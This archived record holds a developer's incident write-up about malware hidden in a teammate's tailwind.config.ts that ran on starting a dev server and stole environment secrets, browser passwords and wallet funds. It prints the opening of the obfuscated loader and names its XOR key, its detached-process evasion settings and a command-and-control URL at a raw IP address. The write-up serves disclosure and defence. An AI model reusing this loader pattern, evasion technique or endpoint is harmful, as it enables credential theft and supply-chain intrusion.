{
	"id": "01587359-27e2-472f-ada3-2e82912a7e82",
	"created_at": "2026-04-06T00:06:50.84842Z",
	"updated_at": "2026-04-10T03:20:43.256784Z",
	"deleted_at": null,
	"sha1_hash": "1e11156cc02ce7d8483f8580878d68c3a3e82359",
	"title": "that one time i got hacked: a security incident breakdown",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 67464,
	"plain_text": "that one time i got hacked: a security incident breakdown\r\nBy Kushagra Sarathe\r\nPublished: 2025-09-30 · Archived: 2026-04-05 16:30:07 UTC\r\nthe setup\r\nafter practicing cybersecurity and bug bounty hunting for about 2 years, i thought i had my security game pretty\r\nlocked down. i've been in tech for over 5 years now, always paranoid about security practices, using 2fa\r\neverywhere, being careful about what i click and what i run. this was my first time getting properly owned, and\r\nhonestly, it was a humbling experience.\r\nwhat happened\r\nit started with what seemed like a normal pre-release day. we had a big production deployment scheduled for the\r\nnext day for ethcc, and one of my teammates had a pr open fixing some bugs related to currency within the app.\r\nthe pr wasn't merged yet, but we needed to be absolutely sure everything worked perfectly before the conference.\r\nso i pulled his branch locally to smoke test all our critical user flows. standard practice before major releases.\r\nas a frontend developer, pnpm dev is muscle memory. pull code, start server, test changes. except this time,\r\nhidden in the tailwind.config.ts file, was a heavily obfuscated javascript payload. my teammate later told me his\r\nide didn't even show this change in the git diff when he was pushing the code.\r\ni was being extra thorough because of the high-stakes deployment. ironically, that thoroughness - pulling and\r\ntesting an unmerged branch - is exactly what got me compromised. everything looked normal at first glance. just\r\nsome standard bug fixes. but the moment i ran that dev server, i was done.\r\nthe fundamental problem\r\nhere's what really sucks about this situation: running other devs' code is completely\r\nnormal workflow. it's not some edge case or bad practice - it's literally how development works. you pull a\r\nteammate's branch, run it locally, test it, leave comments. 
multiple times a day, every day.\r\nand yet, this is one of the fastest attack vectors to compromise an entire dev team. the measures to tackle it? they\r\nmostly suck. you can sandbox your dev environment, but that adds friction to your workflow. you can enforce\r\nstricter reviews, but legitimate code can still hide malicious payloads in config files or dependencies. you can\r\nrequire all branches to be scanned, but obfuscated code often passes automated checks.\r\nit's fundamentally a hard problem. we trust our teammates, we trust our tools, and we operate at a pace that makes\r\nparanoid verification of every single line impractical. attackers know this. they exploit the trust and speed that\r\nmakes modern development possible.\r\nmy attack wasn't sophisticated because of the malware itself - it was sophisticated because it targeted the one\r\nworkflow we can't easily lock down without grinding to a halt.\r\nhttps://kuxhagra.com/posts/that-one-time-i-got-hacked/\r\nPage 1 of 5\n\nthe attack vector\r\nthe malicious code was sophisticated. when i ran the dev server, it:\r\n1. fetched additional malicious code from a blockchain transaction on bsc (binance smart chain)\r\n2. downloaded a 32.4kb executable from github\r\n3. read all our environment variables (database credentials, api keys, jwt secrets, you name it)\r\n4. extracted saved passwords from chrome's encrypted storage\r\n5. executed system commands\r\n6. spawned detached node processes to avoid detection\r\n7. 
cleaned up after itself\r\ndiving deeper into the payload\r\nhere's the actual malicious script that was hidden in our tailwind.config.ts file:\r\nglobal[\"_V\"] = \"7-facus7029\";\r\nglobal[\"r\"] = require;\r\n(function () {\r\n var Jex = \"\",\r\n CoP = 394 - 383;\r\n function rKj(c) {\r\n var p = 289187;\r\n var m = c.length;\r\n var o = [];\r\n for (var e = 0; e \u003c m; e++) {\r\n o[e] = c.charAt(e);\r\n }\r\n for (var e = 0; e \u003c m; e++) {\r\n var q = p * (e + 138) + (p % 48794);\r\n var u = p * (e + 384) + (p % 46631);\r\n var s = q % m;\r\n var n = u % m;\r\n var i = o[s];\r\n o[s] = o[n];\r\n o[n] = i;\r\n p = (q + u) % 3489505;\r\n }\r\n return o.join(\"\");\r\n }\r\n // ... heavily obfuscated code continues ...\r\n})();\r\nlooking at this mess, you can see it's completely obfuscated - just a wall of random characters and function calls\r\nthat mean nothing to human eyes. it used multiple layers of string encryption and function constructors to hide its\r\ntrue purpose. when executed:\r\nstep 1: blockchain payload retrieval\r\nthe script made a request to fetch a specific transaction:\r\ninside this transaction's input data was base64-encoded malicious code. 
the script decoded it using a hardcoded\r\nxor key: $v$5;kmc$ldm*5SA .\r\nstep 2: process spawning and persistence\r\nonce decoded, the script spawned a detached node process using child_process.spawn() with the following\r\noptions:\r\n{\r\n detached: true,\r\n stdio: 'ignore',\r\n windowsHide: true\r\n}\r\nthis made the malicious process run independently of the original server start process, making it harder to detect\r\nand kill.\r\nstep 3: data exfiltration\r\nthe final payload established communication with a command \u0026 control server at\r\nhttp://23.27.20.143:27017/$/boot (hosted on ace data centers/evoxt uk)\r\nthe script systematically:\r\nenumerated environment variables\r\naccessed chrome's encrypted password storage\r\nexecuted system commands\r\nall while running silently in the background as i continued my normal development work.\r\nohh btw if you want to take a look at the binary code, i think it was this\r\nthe damage\r\nthe immediate impact was:\r\nall three of us (devs) had to completely wipe and reset our compromised machines\r\nthe teammate who was first compromised and whose pr i ran locally had to reset his device twice\r\nbecause he got reinfected\r\ni lost a HUGE amount of money drained from my hot wallets - money i had kept for emergency purposes\r\nand my last month's salary\r\nwe lost about 6 working days total dealing with the cleanup\r\nhad to rotate all exposed api keys, database credentials, and secrets\r\nthe financial hit was the worst part. as a developer, i had gotten comfortable with my routine of spinning up dev\r\nservers constantly. i never imagined that something as mundane as running a dev server could lead to losing\r\nmoney. it's a harsh reminder that in our industry, the tools we use daily can become weapons in the wrong hands.\r\nbut it could have been much worse. 
if we hadn't caught it quickly, that malicious code could have made it to\r\nproduction.\r\nhow they got in\r\nfrom what i was able to track initially, my stolen funds went through multiple swaps and bridges across different\r\nblockchain networks - a classic money laundering technique to obscure the trail. the attackers moved quickly to\r\nconvert everything through some cross-chain bridges to make the funds nearly impossible to trace.\r\nbut after a while, i had to stop investigating. diving deeper into tracking where exactly my money went and\r\nanalyzing the attack patterns was starting to affect my mental health. it felt like reopening the wound every time i\r\nlooked at transaction hashes and wallet addresses. the combination of losing that much money and realizing how\r\ncompletely i'd been violated by this malware running on my machine was honestly giving me ptsd.\r\ni made the decision to move on rather than obsess over every detail of how my funds were moved around. i\r\nwouldn't be lying if i said i'm still recovering from this whole thing mentally and financially.\r\nthe aftermath\r\nwe immediately implemented several security measures:\r\nremoved auto-deploy from vercel\r\nenforced 2fa for all team members across all services\r\nadded more branch protection rules\r\nrotated all exposed keys and secrets\r\nremoved direct access to deployment environments\r\ntemporarily removed all the affected devs from all the services\r\nenforced stricter code review processes\r\nlessons learned\r\neven when you think you're being careful, modern attack vectors are incredibly sophisticated. the combination of\r\nsupply chain attacks (compromised dependencies), social engineering (trusted teammate's account), and a tight\r\ndeadline for prod release made this almost impossible to detect until it was too late.\r\nwhat really got me was how normal everything felt. i was just doing what i do every single day as a dev - pull\r\ncode, run the server, test features. 
the attack leveraged the most routine part of my workflow. that's what made it\r\nso effective and so devastating.\r\nmoving forward\r\nthis experience reinforced why security can never be an afterthought. no matter how paranoid you think you are,\r\nattackers are constantly evolving their techniques. the key takeaways:\r\nalways verify unusual commits, even from trusted team members\r\nbe suspicious of any code that seems unnecessarily complex or obfuscated\r\nimplement proper branch protection and review processes\r\nand the list goes on...\r\np.s. since i did not proceed with investigating the hack all the way till the end, some of the info in this post might not\r\nbe 100% accurate. i used my notes from back when i was hacked to write this post.\r\nthanks to\r\njota: for helping with the initial investigation\r\ngowtham \u0026 rcx86: for helping with looking into the malicious binary code\r\ngetting hacked sucks. stay safe out there.\r\nSource: https://kuxhagra.com/posts/that-one-time-i-got-hacked/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://kuxhagra.com/posts/that-one-time-i-got-hacked/"
	],
	"report_names": [
		"that-one-time-i-got-hacked"
	],
	"threat_actors": [],
	"ts_created_at": 1775434010,
	"ts_updated_at": 1775791243,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/1e11156cc02ce7d8483f8580878d68c3a3e82359.pdf",
		"text": "https://archive.orkl.eu/1e11156cc02ce7d8483f8580878d68c3a3e82359.txt",
		"img": "https://archive.orkl.eu/1e11156cc02ce7d8483f8580878d68c3a3e82359.jpg"
	}
}